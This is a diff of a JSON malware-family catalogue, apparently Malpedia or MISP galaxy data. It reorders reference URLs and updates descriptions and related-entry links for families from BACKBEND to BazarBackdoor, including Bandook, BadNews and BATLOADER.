"description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.",
@@ -13432,8 +14311,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig",
- "https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/",
- "https://unit42.paloaltonetworks.com/atoms/thirstygemini/"
+ "https://unit42.paloaltonetworks.com/atoms/thirstygemini/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/"
],
"synonyms": [],
"type": []
@@ -13472,10 +14351,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-geneva",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
],
"synonyms": [
"Lecna",
@@ -13483,15 +14362,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cd6c5f27-cf7e-4529-ae9c-ab5b85102bde",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "23398248-a52a-4a7c-af10-262822d33a4e",
"value": "backspace"
},
@@ -13500,16 +14370,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap",
+ "https://research.checkpoint.com/the-evolution-of-backswap/",
"https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/",
- "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
- "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
- "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://www.cert.pl/en/news/single/backswap-malware-analysis/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
"https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://research.checkpoint.com/the-evolution-of-backswap/"
+ "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
+ "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.cert.pl/en/news/single/backswap-malware-analysis/",
+ "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/"
],
"synonyms": [],
"type": []
@@ -13522,8 +14392,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://www.us-cert.gov/ncas/analysis-reports/ar19-252a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack"
],
"synonyms": [],
"type": []
@@ -13563,9 +14435,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch",
+ "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/",
"https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/"
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf"
],
"synonyms": [],
"type": []
@@ -13578,32 +14450,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
- "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
- "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign",
+ "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
+ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
- "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/",
- "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
"https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "48ca79ff-ea36-4a47-8231-0f7f0db0e09e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1",
"value": "BadNews"
},
@@ -13625,9 +14489,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
- "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/"
+ "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf"
],
"synonyms": [],
"type": []
@@ -13640,9 +14504,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr",
+ "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf",
"https://www.youtube.com/watch?v=E2V4kB_gtcQ",
- "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
"https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/"
],
"synonyms": [
@@ -13684,8 +14548,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital",
- "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf"
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf",
+ "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/"
],
"synonyms": [],
"type": []
@@ -13711,8 +14575,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos",
- "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/banking-trojan-latam-brazil"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/banking-trojan-latam-brazil",
+ "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html"
],
"synonyms": [],
"type": []
@@ -13721,18 +14585,19 @@
"value": "bancos"
},
{
- "description": "",
+ "description": "Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. Over the years, several variants of Bandook were leaked online, and the malware became available for public download.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook",
- "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "https://research.checkpoint.com/2020/bandook-signed-delivered",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook",
"https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/",
- "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
"https://research.checkpoint.com/2020/bandook-signed-delivered/",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered",
+ "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
+ "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america",
+ "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
"https://twitter.com/malwrhunterteam/status/796425285197561856",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook"
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
],
"synonyms": [
"Bandok"
@@ -13752,15 +14617,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fa9b2176-1248-4d59-8da2-c31c7501a81d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7",
"value": "bangat"
},
@@ -13769,10 +14625,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori",
- "http://blog.kleissner.org/?p=69",
+ "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/",
"http://blog.kleissner.org/?p=192",
- "http://osint.bambenekconsulting.com/feeds/",
- "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
+ "http://blog.kleissner.org/?p=69",
+ "http://osint.bambenekconsulting.com/feeds/"
],
"synonyms": [
"BackPatcher",
@@ -13789,30 +14645,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot",
+ "https://malverse.it/analisi-bankshot-copperhedge",
+ "https://blog.reversinglabs.com/blog/hidden-cobra",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-108a",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
- "https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a"
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [
"COPPERHEDGE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d9431c02-5391-11e8-931f-4beceb8bd697",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
"value": "Bankshot"
},
@@ -13860,9 +14709,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bart",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
],
"synonyms": [],
@@ -13876,8 +14725,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper",
- "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs",
- "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
+ "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html",
+ "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs"
],
"synonyms": [],
"type": []
@@ -13898,133 +14747,160 @@
"uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
"value": "Batel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html",
+ "https://www.mandiant.com/resources/seo-poisoning-batloader-atera",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ce6fe6c6-a74a-4cf7-adf8-41b5433bcbb6",
+ "value": "BATLOADER"
+ },
{
"description": "BazarBackdoor is a small backdoor, probably by a TrickBot \"spin-off\" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).\r\n\r\nFor now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
- "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://abnormalsecurity.com/blog/bazarloader-contact-form",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
- "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
- "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
- "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
- "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
- "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://fr3d.hk/blog/campo-loader-simple-but-effective",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
"https://isc.sans.edu/diary/27308",
- "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://twitter.com/Unit42_Intel/status/1458113934024757256",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
- "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
- "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
- "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
- "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
- "https://forensicitguy.github.io/bazariso-analysis-advpack/",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
"https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
"https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
